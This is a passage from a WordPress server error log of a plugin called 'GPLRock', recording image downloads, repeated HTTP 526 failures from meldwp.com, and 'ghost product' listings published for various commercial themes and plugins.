failed for product trusmile-dentist-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:12:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/trusmile---dentist-wordpress-theme-3938.webp for product trusmile-dentist-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:12:28 UTC] GPLRock WARNING: Image download failed for product trusmile-dentist-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/trusmile---dentist-wordpress-theme-3938.webp [05-Apr-2026 17:12:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: trusmile-dentist-wordpress-theme [05-Apr-2026 17:12:53 UTC] GPLRock: Image downloaded successfully for product krowd-crowdfunding-projects-charity-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1c211a93.webp [05-Apr-2026 17:12:53 UTC] GPLRock: Using pre-downloaded image for product krowd-crowdfunding-projects-charity-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1c211a93.webp [05-Apr-2026 17:12:53 UTC] GPLRock: Ghost product published with image - Product ID: krowd-crowdfunding-projects-charity-template-kit [05-Apr-2026 17:12:54 UTC] GPLRock: Image downloaded successfully for product kredok-car-showroom-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-692791c2.webp [05-Apr-2026 17:12:54 UTC] GPLRock: Using pre-downloaded image for product kredok-car-showroom-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-692791c2.webp [05-Apr-2026 17:12:54 UTC] GPLRock: Ghost product published with image - Product ID: kredok-car-showroom-elementor-template-kit [05-Apr-2026 17:12:56 UTC] GPLRock: Image downloaded successfully for product kreatifa-creative-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7b9053f0.webp [05-Apr-2026 17:12:56 UTC] GPLRock: Using pre-downloaded image for product kreatifa-creative-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7b9053f0.webp [05-Apr-2026 17:12:56 UTC] GPLRock: Ghost product published with image - Product ID: kreatifa-creative-digital-agency-elementor-template-kit [05-Apr-2026 17:12:57 UTC] GPLRock: Image downloaded successfully for product krativa-creative-digital-agency-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ecb72b32.webp [05-Apr-2026 17:12:57 UTC] GPLRock: Using pre-downloaded image for product krativa-creative-digital-agency-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ecb72b32.webp [05-Apr-2026 17:12:57 UTC] GPLRock: Ghost product published with image - Product ID: krativa-creative-digital-agency-services-elementor-template-kit [05-Apr-2026 17:12:59 UTC] GPLRock: Image downloaded successfully for product kramic-pottery-ceramic-store-woocommerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2d7a69ba.jpg [05-Apr-2026 17:12:59 UTC] GPLRock: Using pre-downloaded image for product kramic-pottery-ceramic-store-woocommerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2d7a69ba.jpg [05-Apr-2026 17:12:59 UTC] GPLRock: Ghost product published with image - Product ID: kramic-pottery-ceramic-store-woocommerce-elementor-template-kit [05-Apr-2026 17:13:01 UTC] GPLRock: Image downloaded successfully for product koach-life-coach-counseling-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3c27577d.webp [05-Apr-2026 17:13:01 UTC] GPLRock: Using pre-downloaded image for product koach-life-coach-counseling-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3c27577d.webp [05-Apr-2026 17:13:01 UTC] GPLRock: Ghost product published with image - Product ID: koach-life-coach-counseling-elementor-template-kit [05-Apr-2026 17:13:02 UTC] GPLRock: Image downloaded successfully for product knox-technology-apps-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d4848759.webp [05-Apr-2026 17:13:02 UTC] GPLRock: Using pre-downloaded image for product knox-technology-apps-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d4848759.webp [05-Apr-2026 17:13:02 UTC] GPLRock: Ghost product published with image - Product ID: knox-technology-apps-template-kit [05-Apr-2026 17:13:04 UTC] GPLRock: Image downloaded successfully for product knight-esports-gaming-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-23bed3b6.webp [05-Apr-2026 17:13:04 UTC] GPLRock: Using pre-downloaded image for product knight-esports-gaming-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-23bed3b6.webp [05-Apr-2026 17:13:04 UTC] GPLRock: Ghost product published with image - Product ID: knight-esports-gaming-elementor-template-kit [05-Apr-2026 17:13:05 UTC] GPLRock: Image downloaded successfully for product klinta-cleaning-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-27891f85.webp [05-Apr-2026 17:13:05 UTC] GPLRock: Using pre-downloaded image for product klinta-cleaning-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-27891f85.webp [05-Apr-2026 17:13:05 UTC] GPLRock: Ghost product published with image - Product ID: klinta-cleaning-services-elementor-template-kit [05-Apr-2026 17:13:07 UTC] GPLRock: Image downloaded successfully for product klein-cleaning-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-25006383.webp [05-Apr-2026 17:13:07 UTC] GPLRock: Using pre-downloaded image for product klein-cleaning-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-25006383.webp [05-Apr-2026 17:13:07 UTC] GPLRock: Ghost product published with image - Product ID: klein-cleaning-services-elementor-template-kit [05-Apr-2026 17:15:37 UTC] GPLRock: Image download failed for product stock-market-forex-charts-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:15:39 UTC] GPLRock: Image download failed for product stock-market-forex-charts-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:15:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stock-market--forex-charts--wordpress-plugin-15974.webp for product stock-market-forex-charts-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:15:41 UTC] GPLRock: Image download failed for product stock-market-forex-charts-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:15:43 UTC] GPLRock: Image download failed for product stock-market-forex-charts-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:15:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stock-market--forex-charts--wordpress-plugin-15974.webp for product stock-market-forex-charts-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:15:45 UTC] GPLRock WARNING: Image download failed for product stock-market-forex-charts-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/stock-market--forex-charts--wordpress-plugin-15974.webp [05-Apr-2026 17:15:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: stock-market-forex-charts-wordpress-plugin [05-Apr-2026 17:15:45 UTC] GPLRock: Image download failed for product dhpopup-popup-builder-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:15:47 UTC] GPLRock: Image download failed for product dhpopup-popup-builder-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:15:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dhpopup---popup-builder-for-wpbakery-page-builder-5682.webp for product dhpopup-popup-builder-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:15:50 UTC] GPLRock: Image download failed for product dhpopup-popup-builder-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:15:52 UTC] GPLRock: Image download failed for product dhpopup-popup-builder-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:15:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dhpopup---popup-builder-for-wpbakery-page-builder-5682.webp for product dhpopup-popup-builder-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:15:54 UTC] GPLRock WARNING: Image download failed for product dhpopup-popup-builder-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/dhpopup---popup-builder-for-wpbakery-page-builder-5682.webp [05-Apr-2026 17:15:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dhpopup-popup-builder-for-wpbakery-page-builder [05-Apr-2026 17:15:54 UTC] GPLRock: Image download failed for product playtube-ios-sharing-video-script-mobile-ios-native-application (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:15:56 UTC] GPLRock: Image download failed for product playtube-ios-sharing-video-script-mobile-ios-native-application (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:15:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/playtube-ios---sharing-video-script-mobile-ios-native-application-12883.webp for product playtube-ios-sharing-video-script-mobile-ios-native-application after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:15:58 UTC] GPLRock: Image download failed for product playtube-ios-sharing-video-script-mobile-ios-native-application (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:00 UTC] GPLRock: Image download failed for product playtube-ios-sharing-video-script-mobile-ios-native-application (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/playtube-ios---sharing-video-script-mobile-ios-native-application-12883.webp for product playtube-ios-sharing-video-script-mobile-ios-native-application after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:16:02 UTC] GPLRock WARNING: Image download failed for product playtube-ios-sharing-video-script-mobile-ios-native-application. URL: https://meldwp.com/wp-content/uploads/playtube-ios---sharing-video-script-mobile-ios-native-application-12883.webp [05-Apr-2026 17:16:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: playtube-ios-sharing-video-script-mobile-ios-native-application [05-Apr-2026 17:16:03 UTC] GPLRock: Image downloaded successfully for product zumbla-deluxe-admob-gdpr-android-studio (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3aff0434.webp [05-Apr-2026 17:16:03 UTC] GPLRock: Using pre-downloaded image for product zumbla-deluxe-admob-gdpr-android-studio: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3aff0434.webp [05-Apr-2026 17:16:03 UTC] GPLRock: Ghost product published with image - Product ID: zumbla-deluxe-admob-gdpr-android-studio [05-Apr-2026 17:16:03 UTC] GPLRock: Image download failed for product pinworks-wordpress-pinterest-gallery-widget (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:05 UTC] GPLRock: Image download failed for product pinworks-wordpress-pinterest-gallery-widget (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pinworks-wordpress-pinterest-gallery-widget-18701.webp for product pinworks-wordpress-pinterest-gallery-widget after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:16:07 UTC] GPLRock: Image download failed for product pinworks-wordpress-pinterest-gallery-widget (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:09 UTC] GPLRock: Image download failed for product pinworks-wordpress-pinterest-gallery-widget (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pinworks-wordpress-pinterest-gallery-widget-18701.webp for product pinworks-wordpress-pinterest-gallery-widget after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:16:11 UTC] GPLRock WARNING: Image download failed for product pinworks-wordpress-pinterest-gallery-widget. URL: https://meldwp.com/wp-content/uploads/pinworks-wordpress-pinterest-gallery-widget-18701.webp [05-Apr-2026 17:16:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pinworks-wordpress-pinterest-gallery-widget [05-Apr-2026 17:16:11 UTC] GPLRock: Image download failed for product price-matrix-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:14 UTC] GPLRock: Image download failed for product price-matrix-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/price-matrix-for-woocommerce-3840.webp for product price-matrix-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:16:16 UTC] GPLRock: Image download failed for product price-matrix-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:18 UTC] GPLRock: Image download failed for product price-matrix-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/price-matrix-for-woocommerce-3840.webp for product price-matrix-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:16:20 UTC] GPLRock WARNING: Image download failed for product price-matrix-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/price-matrix-for-woocommerce-3840.webp [05-Apr-2026 17:16:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: price-matrix-for-woocommerce [05-Apr-2026 17:16:20 UTC] GPLRock: Image download failed for product paytm-payment-gateway-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:22 UTC] GPLRock: Image download failed for product paytm-payment-gateway-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/paytm-payment-gateway-woocommerce-plugin-19261.webp for product paytm-payment-gateway-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:16:24 UTC] GPLRock: Image download failed for product paytm-payment-gateway-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:27 UTC] GPLRock: Image download failed for product paytm-payment-gateway-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/paytm-payment-gateway-woocommerce-plugin-19261.webp for product paytm-payment-gateway-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:16:29 UTC] GPLRock WARNING: Image download failed for product paytm-payment-gateway-woocommerce-plugin. URL: https://meldwp.com/wp-content/uploads/paytm-payment-gateway-woocommerce-plugin-19261.webp [05-Apr-2026 17:16:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: paytm-payment-gateway-woocommerce-plugin [05-Apr-2026 17:16:29 UTC] GPLRock: Image download failed for product clipboard-total-control-control-what-happen-when-somebody-copy-your-text-wordpess-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:31 UTC] GPLRock: Image download failed for product clipboard-total-control-control-what-happen-when-somebody-copy-your-text-wordpess-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/clipboard-total-control---control-what-happen-when-somebody-copy-your-text---wor-12691.webp for product clipboard-total-control-control-what-happen-when-somebody-copy-your-text-wordpess-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:16:33 UTC] GPLRock: Image download failed for product clipboard-total-control-control-what-happen-when-somebody-copy-your-text-wordpess-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:35 UTC] GPLRock: Image download failed for product clipboard-total-control-control-what-happen-when-somebody-copy-your-text-wordpess-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/clipboard-total-control---control-what-happen-when-somebody-copy-your-text---wor-12691.webp for product clipboard-total-control-control-what-happen-when-somebody-copy-your-text-wordpess-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:16:37 UTC] GPLRock WARNING: Image download failed for product clipboard-total-control-control-what-happen-when-somebody-copy-your-text-wordpess-plugin. URL: https://meldwp.com/wp-content/uploads/clipboard-total-control---control-what-happen-when-somebody-copy-your-text---wor-12691.webp [05-Apr-2026 17:16:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: clipboard-total-control-control-what-happen-when-somebody-copy-your-text-wordpess-plugin [05-Apr-2026 17:16:38 UTC] GPLRock: Image download failed for product 3d-map-wordpress-plugin-3d-mapper (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:40 UTC] GPLRock: Image download failed for product 3d-map-wordpress-plugin-3d-mapper (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/3d-map-wordpress-plugin---3d-mapper-5760.webp for product 3d-map-wordpress-plugin-3d-mapper after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:16:42 UTC] GPLRock: Image download failed for product 3d-map-wordpress-plugin-3d-mapper (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:44 UTC] GPLRock: Image download failed for product 3d-map-wordpress-plugin-3d-mapper (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/3d-map-wordpress-plugin---3d-mapper-5760.webp for product 3d-map-wordpress-plugin-3d-mapper after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:16:46 UTC] GPLRock WARNING: Image download failed for product 3d-map-wordpress-plugin-3d-mapper. URL: https://meldwp.com/wp-content/uploads/3d-map-wordpress-plugin---3d-mapper-5760.webp [05-Apr-2026 17:16:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: 3d-map-wordpress-plugin-3d-mapper [05-Apr-2026 17:16:46 UTC] GPLRock: Image download failed for product product-alerts-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:48 UTC] GPLRock: Image download failed for product product-alerts-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/product-alerts-for-woocommerce-23207.webp for product product-alerts-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:16:51 UTC] GPLRock: Image download failed for product product-alerts-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:53 UTC] GPLRock: Image download failed for product product-alerts-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:16:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/product-alerts-for-woocommerce-23207.webp for product product-alerts-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:16:55 UTC] GPLRock WARNING: Image download failed for product product-alerts-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/product-alerts-for-woocommerce-23207.webp [05-Apr-2026 17:16:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: product-alerts-for-woocommerce [05-Apr-2026 17:17:20 UTC] GPLRock: Image download failed for product travel-tour-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:17:22 UTC] GPLRock: Image download failed for product travel-tour-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:17:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/travel---tour-booking-wordpress-theme-2730.webp for product travel-tour-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:17:25 UTC] GPLRock: Image download failed for product travel-tour-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:17:27 UTC] GPLRock: Image download failed for product travel-tour-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:17:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/travel---tour-booking-wordpress-theme-2730.webp for product travel-tour-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:17:29 UTC] GPLRock WARNING: Image download failed for product travel-tour-booking-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/travel---tour-booking-wordpress-theme-2730.webp [05-Apr-2026 17:17:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: travel-tour-booking-wordpress-theme [05-Apr-2026 17:17:29 UTC] GPLRock: Image download failed for product hyani-bold-blog-and-magazine (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:17:31 UTC] GPLRock: Image download failed for product hyani-bold-blog-and-magazine (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:17:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hyani--bold-blog-and-magazine-7958.webp for product hyani-bold-blog-and-magazine after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:17:33 UTC] GPLRock: Image download failed for product hyani-bold-blog-and-magazine (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:28:53 UTC] GPLRock: Image download failed for product nixe-hotel-and-yachting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:28:55 UTC] GPLRock: Image download failed for product nixe-hotel-and-yachting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:28:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nixe--hotel-and-yachting-wordpress-theme-4662.webp for product nixe-hotel-and-yachting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:28:57 UTC] GPLRock: Image download failed for product nixe-hotel-and-yachting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:28:59 UTC] GPLRock: Image download failed for product nixe-hotel-and-yachting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nixe--hotel-and-yachting-wordpress-theme-4662.webp for product nixe-hotel-and-yachting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:29:01 UTC] GPLRock WARNING: Image download failed for product nixe-hotel-and-yachting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nixe--hotel-and-yachting-wordpress-theme-4662.webp [05-Apr-2026 17:29:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nixe-hotel-and-yachting-wordpress-theme [05-Apr-2026 17:29:03 UTC] GPLRock: Image download failed for product dvents-events-management-companies-and-agencies-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:05 UTC] GPLRock: Image download failed for product dvents-events-management-companies-and-agencies-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dvents---events-management-companies-and-agencies-wordpress-theme-28116.webp for product dvents-events-management-companies-and-agencies-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:29:07 UTC] GPLRock: Image download failed for product dvents-events-management-companies-and-agencies-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:09 UTC] GPLRock: Image download failed for product dvents-events-management-companies-and-agencies-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dvents---events-management-companies-and-agencies-wordpress-theme-28116.webp for product dvents-events-management-companies-and-agencies-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:29:11 UTC] GPLRock WARNING: Image download failed for product dvents-events-management-companies-and-agencies-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dvents---events-management-companies-and-agencies-wordpress-theme-28116.webp [05-Apr-2026 17:29:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dvents-events-management-companies-and-agencies-wordpress-theme [05-Apr-2026 17:29:11 UTC] GPLRock: Image download failed for product alico-insurance-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:13 UTC] GPLRock: Image download failed for product alico-insurance-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alico---insurance-wordpress-11591.webp for product alico-insurance-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:29:16 UTC] GPLRock: Image download failed for product alico-insurance-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:18 UTC] GPLRock: Image download failed for product alico-insurance-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alico---insurance-wordpress-11591.webp for product alico-insurance-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:29:20 UTC] GPLRock WARNING: Image download failed for product alico-insurance-wordpress. URL: https://meldwp.com/wp-content/uploads/alico---insurance-wordpress-11591.webp [05-Apr-2026 17:29:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: alico-insurance-wordpress [05-Apr-2026 17:29:20 UTC] GPLRock: Image download failed for product gifts-shop-handmade-souvenirs-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:22 UTC] GPLRock: Image download failed for product gifts-shop-handmade-souvenirs-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gifts-shop--handmade-souvenirs-woocommerce-wordpress-theme-8854.webp for product gifts-shop-handmade-souvenirs-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:29:24 UTC] GPLRock: Image download failed for product gifts-shop-handmade-souvenirs-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:26 UTC] GPLRock: Image download failed for product gifts-shop-handmade-souvenirs-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gifts-shop--handmade-souvenirs-woocommerce-wordpress-theme-8854.webp for product gifts-shop-handmade-souvenirs-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:29:28 UTC] GPLRock WARNING: Image download failed for product gifts-shop-handmade-souvenirs-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gifts-shop--handmade-souvenirs-woocommerce-wordpress-theme-8854.webp [05-Apr-2026 17:29:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gifts-shop-handmade-souvenirs-woocommerce-wordpress-theme [05-Apr-2026 17:29:29 UTC] GPLRock: Image download failed for product arkai-modern-multipurpose-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:31 UTC] GPLRock: Image download failed for product arkai-modern-multipurpose-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arkai---modern--multipurpose-wordpress-blog-theme-26916.webp for product arkai-modern-multipurpose-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:29:33 UTC] GPLRock: Image download failed for product arkai-modern-multipurpose-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:35 UTC] GPLRock: Image download failed for product arkai-modern-multipurpose-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:29:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arkai---modern--multipurpose-wordpress-blog-theme-26916.webp for product arkai-modern-multipurpose-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: 